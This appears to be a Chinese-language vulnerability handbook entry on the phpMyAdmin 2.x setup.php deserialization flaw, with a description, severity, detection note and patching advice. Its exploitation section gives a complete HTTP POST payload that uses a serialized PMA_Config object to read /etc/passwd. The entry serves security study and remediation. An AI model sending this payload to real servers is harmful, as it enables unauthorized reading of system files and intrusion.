2.20.2 反序列化漏洞

漏洞名称

phpmyadmin scripts/setup.php 反序列化漏洞（WooYun-2016-199433）

漏洞描述

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其2.x版本中存在一处反序列化漏洞，通过该漏洞，攻击者可以读取任意文件或执行任意代码。

参考链接：

• <https://www.bbsmax.com/A/QW5YY13O5m/>

漏洞等级:

高危

漏洞危害

读取任意文件或执行任意代码

漏洞检测方法

利用POC去试验是否存在该漏洞

漏洞利用方法

构造如下数据包,即可读取/etc/passwd

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

漏洞修复方案:

1,及时去官网修补漏洞

2,更新到最新版